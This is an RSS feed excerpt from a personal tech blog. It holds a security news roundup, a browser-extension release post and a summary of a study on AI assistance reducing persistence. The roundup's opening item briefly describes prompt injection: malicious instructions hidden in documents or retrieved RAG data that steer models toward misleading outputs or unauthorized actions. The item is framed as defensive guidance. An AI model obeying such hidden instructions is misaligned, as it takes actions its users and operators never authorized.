lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3>Prompt Injection Emerges as a Core Application Security Challenge (Not Just an AI Model Flaw)</h3><p>Recent research from VerSprite highlights that <strong>prompt injection</strong> remains a persistent and practical threat in AI deployments. It&#8217;s not solely about clever user inputs fooling large language models (LLMs); the core issue lies in how applications handle untrusted content&#8212;failing to properly isolate instructions from data, validate inputs, or control tool access and workflows.</p><p>Key observations include:</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><ul><li><p>Guardrails help but don&#8217;t fully mitigate risks when malicious instructions hide in documents, retrieved data, or RAG (Retrieval-Augmented Generation) systems.</p></li><li><p>Attacks vary based on context, file ordering, and workflow design, potentially leading to misleading outputs, unauthorized actions, or decision influence.</p></li><li><p>This is an <strong>appsec and threat modeling</strong> problem requiring layered defenses: narrow permissions, review gates, logging, and adversarial testing.</p></li></ul><p><strong>Why it matters today</strong>: As enterprises rush AI into productivity, support, and decision-making tools, treating prompt injection as a design risk (rather than an edge case) is critical for governance and secure-by-design practices. Organizations should prioritize isolating trusted instructions and monitoring model behavior.</p><h3>Ransomware Evolves with Physical/Social Engineering Tactics (e.g., Silent Ransom Group)</h3><p>Cybercriminals are blending digital and physical methods. Reports detail groups like the Silent Ransom Group using phishing and social engineering to gain initial access, then impersonating IT staff&#8212;sometimes showing up in person or using remote tools&#8212;to deploy ransomware, exfiltrate sensitive data (contracts, SSNs, tax records), and demand payment while threatening leaks.</p><p>This hybrid approach bypasses traditional perimeter defenses. Broader 2026 trends show ransomware disrupting sectors like education, healthcare, and manufacturing, with AI tools lowering barriers for attackers.</p><p><strong>Defensive takeaways</strong>:</p><ul><li><p>Train staff to verify IT requests rigorously.</p></li><li><p>Test backups regularly (a common failure point).</p></li><li><p>Implement zero-trust principles and monitor for anomalous physical/remote access.</p></li><li><p>Preparation (disaster recovery, continuity) is more important than ever.</p></li></ul><p>India&#8217;s 2026 Cyber Threat Report also underscores high volumes of threats, including ransomware, emphasizing the need for robust threat intelligence.</p><h3>New Vulnerabilities and Exploits in the Wild (CVEs, Supply Chain, and Targeted Attacks)</h3><p>Several fresh issues surfaced or were highlighted:</p><ul><li><p><strong>CVE-2026-9506</strong>: Path traversal in Bagisto&#8217;s ImageCacheController allowing arbitrary file access.</p></li><li><p>SolarWinds Serv-U vulnerability being exploited in the wild via crafted POST requests.</p></li><li><p>VS Code introducing auto-update delays to curb supply chain attacks.</p></li><li><p>Ongoing activity around tools like UNC3753 using vishing and physical intrusions for data theft/extortion.</p></li><li><p>Meta reported ~20,000 Instagram accounts compromised via AI-assisted support abuse.</p></li></ul><p><strong>Broader context</strong>: AI-powered cybercrime tools (phishing, malware) are proliferating on the dark web, and agentic AI introduces new enterprise risks due to autonomous decision-making.</p><p><strong>Action items</strong>: Patch promptly, review supply chain security (e.g., open-source dependencies), enable features like Android&#8217;s caller verification, and monitor for social engineering.</p><h3>Ongoing 2026 Trends &#8211; Data Breaches, Nation-State Activity, and AI Arms Race</h3><p>Summaries of the year&#8217;s incidents point to major breaches (e.g., FBI wiretap systems, Social Security data issues, supply chain compromises affecting tech platforms), destructive operations, and escalating nation-state threats (e.g., pre-positioning in critical infrastructure).</p><p>AI is a double-edged sword: used for vulnerability discovery/remediation (e.g., Anthropic frameworks) but also by attackers. Regulatory pushes (e.g., DPDP compliance, telecom defenses) are responding, but gaps remain.</p><p><strong>Overall outlook</strong>: Cybersecurity in mid-2026 demands integrated defenses against AI-augmented threats, hybrid attacks, and rapid vulnerability exploitation. Focus on resilience, adversarial testing, and continuous monitoring.</p><p>Stay vigilant&#8212;small oversights can lead to major disruptions.</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div>]]></content:encoded></item><item><title><![CDATA[Collections Plus 1.3: Open a Whole Collection in One Click]]></title><description><![CDATA[My free, local-first replacement for the retiring Edge Collections now does the thing collections were always meant to do &#8212; open everything at once, into a named tab group.]]></description><link>https://rodtrent.substack.com/p/collections-plus-13-open-a-whole</link><guid isPermaLink="false">https://rodtrent.substack.com/p/collections-plus-13-open-a-whole</guid><dc:creator><![CDATA[Rod Trent]]></dc:creator><pubDate>Mon, 08 Jun 2026 15:01:27 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!oWo3!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F859dc08d-971e-4e0b-ab3d-b69dce566eec_1248x832.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!oWo3!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F859dc08d-971e-4e0b-ab3d-b69dce566eec_1248x832.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!oWo3!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F859dc08d-971e-4e0b-ab3d-b69dce566eec_1248x832.jpeg 424w, https://substackcdn.com/image/fetch/$s_!oWo3!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F859dc08d-971e-4e0b-ab3d-b69dce566eec_1248x832.jpeg 848w, https://substackcdn.com/image/fetch/$s_!oWo3!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F859dc08d-971e-4e0b-ab3d-b69dce566eec_1248x832.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!oWo3!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F859dc08d-971e-4e0b-ab3d-b69dce566eec_1248x832.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!oWo3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F859dc08d-971e-4e0b-ab3d-b69dce566eec_1248x832.jpeg" width="1248" height="832" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/859dc08d-971e-4e0b-ab3d-b69dce566eec_1248x832.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:832,&quot;width&quot;:1248,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:239640,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/201073579?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F859dc08d-971e-4e0b-ab3d-b69dce566eec_1248x832.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!oWo3!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F859dc08d-971e-4e0b-ab3d-b69dce566eec_1248x832.jpeg 424w, https://substackcdn.com/image/fetch/$s_!oWo3!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F859dc08d-971e-4e0b-ab3d-b69dce566eec_1248x832.jpeg 848w, https://substackcdn.com/image/fetch/$s_!oWo3!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F859dc08d-971e-4e0b-ab3d-b69dce566eec_1248x832.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!oWo3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F859dc08d-971e-4e0b-ab3d-b69dce566eec_1248x832.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>A collection has one job: you save a pile of related pages, and later you open them. All of them. Together.</p><p>The old Microsoft Edge Collections did this beautifully &#8212; one button reopened the whole set into a fresh tab group. It&#8217;s the feature I missed most when I started building Collections Plus, my open, local-first replacement for Edge Collections (which Microsoft is retiring in Edge 149, around June 2026).</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p>With version 1.3, it&#8217;s back &#8212; and it&#8217;s a single click.</p><h2>One click. The whole collection. A named tab group.</h2><p>Here&#8217;s what changed:</p><ul><li><p>Every collection card now has a &#9654; &#8220;Open all pages&#8221; button. No opening the collection first, no digging through a &#8220;&#8230;&#8221; menu. See the collection, click &#9654;, done.</p></li><li><p>The pages open into a browser tab group named after the collection. Your &#8220;Weekend Reading&#8221; collection opens as a tidy, collapsible Weekend Reading tab group &#8212; grouped, labeled, and easy to fold away when you&#8217;re not in it. Exactly the Edge Collections behavior people loved.</p></li></ul><p>Before, opening a collection took four steps: open the panel, open the collection, open the &#8220;&#8230;&#8221; menu, click <em>Open all pages. Now it&#8217;s two: open the panel, click &#9654;. (If you keep the side panel pinned, it&#8217;s literally one.)</em></p><p>That&#8217;s the headline. But I couldn&#8217;t leave the cards alone once I was in there.</p><h2>Cleaner cards, while I was at it</h2><p>A few quality-of-life touches landed alongside the big one:</p><ul><li><p>Collection names show in full. Long titles used to get chopped off with an ellipsis in a cramped little column. Now they wrap and you see the whole name &#8212; no more &#8220;My Really Important Resea&#8230;&#8221;.</p></li><li><p>Card buttons get out of the way. The per-card actions (move, archive, pin, trash) now stay hidden until you hover the card, so the name gets the full width. Pinned collections still show a small &#128204; so you know at a glance.</p></li><li><p>A tidier header. The panel header now carries the Collections Plus icon for a bit of branding, and the &#8220;Collections Plus&#8221; title never gets clipped, whatever width you&#8217;ve dragged the panel to.</p></li></ul><p>Small things, but they&#8217;re the things you bump into every single day.</p><h2>If you&#8217;re new here: what Collections Plus actually is</h2><p>It&#8217;s a small browser extension for Chrome and Edge that brings Edge Collections back &#8212; and then some:</p><ul><li><p>Save the current page, a right-clicked link or image, selected text as a note, or all your open tabs at once.</p></li><li><p>Folders, tags, pinning, and search to keep big libraries manageable.</p></li><li><p>Checkboxes and custom fields turn any collection into a shopping list, packing list, or parts list.</p></li><li><p>Real Excel (.xlsx) export, plus CSV, Markdown, HTML, and copy-links.</p></li><li><p>A recoverable Trash and an Archive, so nothing vanishes by accident.</p></li><li><p>Optional cross-device sync &#8212; with no account and no server. It syncs through a single file you drop in a folder your computer already keeps synced (OneDrive, Google Drive, Dropbox, iCloud Drive&#8230;). I never see your data. There&#8217;s no &#8220;I&#8221; that could.</p></li></ul><p>And the whole promise stays intact: everything is stored locally in your browser. No account, no telemetry, no server. Sync and offline image caching are both off until <em>you turn them on.</em></p><h2>Get it</h2><p>It&#8217;s free and open source (MIT).</p><p>&#128073; <a href="https://chromewebstore.google.com/detail/collections-plus/eekpoobgfoollcmobjeeahonpbjjghia">Install Collections Plus from the Chrome Web Store</a> &#8212; one click, and it auto-updates from there.</p><p>Migrating from Edge is one click too: export your Collections data in Edge, then in Collections Plus use Import Edge CSV&#8230;.</p><p>Source, issues, and ideas live on <a href="https://github.com/rod-trent/Collections-Plus">GitHub</a>. If there&#8217;s a feature you want, tell me &#8212; I build the things people actually ask for.</p><p><em>Edge Collections is going away. Yours doesn&#8217;t have to.</em></p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div>]]></content:encoded></item><item><title><![CDATA[AI Assistance Makes You Better Until It Doesn’t]]></title><description><![CDATA[New Research Shows Chatbots Reduce Persistence and Hurt Independent Thinking]]></description><link>https://rodtrent.substack.com/p/ai-assistance-makes-you-better-until</link><guid isPermaLink="false">https://rodtrent.substack.com/p/ai-assistance-makes-you-better-until</guid><dc:creator><![CDATA[Rod Trent]]></dc:creator><pubDate>Mon, 08 Jun 2026 12:00:40 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!Y5qn!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e090bd9-6149-4be2-9853-4ae40d807163_1168x784.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Y5qn!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e090bd9-6149-4be2-9853-4ae40d807163_1168x784.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Y5qn!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e090bd9-6149-4be2-9853-4ae40d807163_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!Y5qn!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e090bd9-6149-4be2-9853-4ae40d807163_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!Y5qn!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e090bd9-6149-4be2-9853-4ae40d807163_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!Y5qn!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e090bd9-6149-4be2-9853-4ae40d807163_1168x784.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Y5qn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e090bd9-6149-4be2-9853-4ae40d807163_1168x784.jpeg" width="1168" height="784" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7e090bd9-6149-4be2-9853-4ae40d807163_1168x784.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:784,&quot;width&quot;:1168,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:240094,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/198543335?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e090bd9-6149-4be2-9853-4ae40d807163_1168x784.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Y5qn!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e090bd9-6149-4be2-9853-4ae40d807163_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!Y5qn!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e090bd9-6149-4be2-9853-4ae40d807163_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!Y5qn!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e090bd9-6149-4be2-9853-4ae40d807163_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!Y5qn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e090bd9-6149-4be2-9853-4ae40d807163_1168x784.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>We&#8217;ve all been there. You&#8217;re stuck on a tough math problem, a dense reading passage, or a coding challenge. You fire up ChatGPT (or Grok, Claude, whatever your favorite is), type a quick prompt, and <em>bam</em>&#8212;the answer appears. Instant relief. You feel smarter, more productive. Problem solved.</p><p>But what if that helpful little habit is quietly making you <em>worse</em> at solving problems on your own?</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p>A new large-scale study provides the first causal evidence that AI assistance delivers short-term gains at a steep long-term cost: it reduces persistence and impairs unassisted performance. The paper, titled <em>AI Assistance Reduces Persistence and Hurts Independent Performance</em> by Grace Liu (Carnegie Mellon), Brian Christian (Oxford), Tsvetomira Dumbalska (Oxford), and colleagues, was conducted with 1,222 participants across three randomized controlled experiments. It&#8217;s a wake-up call for anyone who uses AI daily for studying, writing, coding, or thinking.</p><h3>The Experiments: Clean, Controlled, and Telling</h3><p>The researchers used two classic cognitive tasks:</p><ul><li><p><strong>Fraction arithmetic</strong> (Experiments 1 and 2): Problems ranged from simple one-step calculations to complex three-step ones. Fractions are a foundational math skill, and performance improves with practice&#8212;perfect for testing learning and persistence.</p></li><li><p><strong>Reading comprehension</strong> (Experiment 3): SAT-style questions involving two opposing texts and a multiple-choice question about how the authors would respond to each other. This taps into critical thinking and mental model-building.</p></li></ul><p>Participants were randomly assigned to either an <strong>AI condition</strong> (access to GPT-5 in a sidebar during the &#8220;learning&#8221; phase) or a <strong>control condition</strong> (no AI, just self-work). After ~10&#8211;15 minutes of practice problems, the AI was abruptly removed for everyone. Then came the critical test: three final problems solved completely independently. Both groups saw correct answers after mistakes to allow learning, and everyone could skip problems (a clean behavioral measure of giving up).</p><p>Crucially, Experiment 2 added a pretest and matched the interface experience between groups to rule out confounds like skill differences or sidebar presence.</p><h3>The Results: Short-Term Win, Immediate Crash</h3><p><strong>During AI use</strong>, the AI group crushed it. They solved more problems correctly and skipped far fewer.</p><p><strong>Once the AI disappeared</strong>, everything flipped:</p><ul><li><p><strong>Independent performance dropped.</strong> In Experiment 1, AI users solved only 57% of test problems vs. 73% for controls (Cohen&#8217;s <em>d</em> = -0.42). Experiment 2 replicated this (71% vs. 77%). Experiment 3 (reading comp) showed an even larger gap: 76% vs. 89% (Cohen&#8217;s <em>d</em> = -0.42).</p></li><li><p><strong>Persistence collapsed.</strong> AI users were significantly more likely to skip test problems&#8212;essentially giving up. In Experiment 1, skip rates doubled (20% vs. 11%). In reading comprehension, it was 8% vs. 1%.</p></li></ul><p>These effects emerged after <em>just 10&#8211;15 minutes</em> of interaction.</p><p>Even more damning: <strong>how</strong> people used the AI mattered. In Experiment 2, participants self-reported their strategy. The majority (61%) used it to get <em>direct answers</em>. Those users showed the biggest declines&#8212;worse solve rates and higher skip rates than controls, hint-users, or non-users. People who asked for hints or clarifications fared better. Those who never used the AI sometimes even improved relative to their pretest.</p><p>The paper&#8217;s figures (solve rates and skip rates over time) make the pattern unmistakable: smooth sailing with AI, then a sharp drop the moment it&#8217;s gone.</p><h3>Why Does This Happen?</h3><p>The authors point to two reinforcing mechanisms rooted in cognitive science:</p><ol><li><p><strong>Shifted expectations (hedonic adaptation on steroids).</strong> AI delivers instant, perfect answers. Normal effort suddenly feels intolerably slow and frustrating. Each offload recalibrates your sense of &#8220;how long a task <em>should</em> take,&#8221; making unaided work feel disproportionately hard.</p></li><li><p><strong>Loss of productive struggle.</strong> Real learning requires wrestling with difficulty. That struggle builds not just knowledge but <em>metacognitive calibration</em>&#8212;the accurate self-knowledge of &#8220;I can figure this out if I keep going.&#8221; AI removes the struggle, so people never get to experience (and therefore trust) their own capability. Without that, persistence withers.</p></li></ol><p>This isn&#8217;t just &#8220;cognitive offloading&#8221; like using a calculator. AI offloads <em>reasoning itself</em> across domains, accelerating the effect.</p><h3>Broader Implications: The &#8220;Boiling Frog&#8221; of Cognitive Deskilling</h3><p>The public significance statement nails it: AI promises immediate help with studying, writing, coding, and brainstorming&#8212;but at a heavy cognitive cost. If these effects compound over months or years of daily use, we risk eroding the very traits that drive long-term success: grit, persistence, and independent reasoning.</p><p>The paper situates this in larger conversations about human-AI collaboration. Most current AI systems are optimized for short-term helpfulness (never say no, answer instantly). That misalignment between &#8220;what feels good right now&#8221; and &#8220;what builds lasting human capability&#8221; is exactly why good mentors sometimes withhold help.</p><p>The risks aren&#8217;t evenly distributed. Students with fewer resources may be most vulnerable to over-reliance.</p><h3>What Now? A Call for Better AI&#8212;and Better Habits</h3><p>The authors aren&#8217;t anti-AI. They argue we need AI systems that optimize for <em>long-term human competence and autonomy</em>, not just immediate task completion. That means:</p><ul><li><p>Sometimes refusing to give direct answers</p></li><li><p>Scaffolding productive struggle instead of short-circuiting it</p></li><li><p>Prioritizing learning over speed</p></li></ul><p>On the user side, the message is clear: Use AI as a tutor, not a crutch. Ask for hints and explanations rather than full solutions. Force yourself to struggle productively first. Treat AI like a great mentor who knows when <em>not</em> to help.</p><p>The project page has more details and the full preprint.</p><h3>Final Thought</h3><p>AI isn&#8217;t making us stupid overnight. But after just 10 minutes, it can measurably weaken our ability to persist and think independently. Scale that up to daily use across education and work, and the cumulative impact could be profound.</p><p>AI makes you faster right now, but potentially weaker later, especially if it replaces your own thinking instead of supporting it.</p><p>The next generation of AI won&#8217;t just be judged on how helpful it is in the moment. It will be judged on whether it leaves humans stronger when it&#8217;s turned off.</p><p>What do you think&#8212;have you noticed yourself (or your kids/students) relying more on AI and persisting less? Drop your experiences in the comments. And if you&#8217;re building AI, this paper is required reading.</p><p><em>This post is based on the preprint &#8220;<a href="https://www.researchgate.net/publication/403562106_AI_Assistance_Reduces_Persistence_and_Hurts_Independent_Performance">AI Assistance Reduces Persistence and Hurts Independent Performance</a>&#8221; by Grace Liu et al. (under review).</em></p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div>]]></content:encoded></item><item><title><![CDATA[Security Check-in Quick Hits: Cisco Exploits, Mac Stealer, Supply Chain Hits & More]]></title><description><![CDATA[For June 7, 2026]]></description><link>https://rodtrent.substack.com/p/security-check-in-quick-hits-cisco-4f1</link><guid isPermaLink="false">https://rodtrent.substack.com/p/security-check-in-quick-hits-cisco-4f1</guid><dc:creator><![CDATA[Rod Trent]]></dc:creator><pubDate>Sun, 07 Jun 2026 18:01:25 GMT</pubDate><enclosure 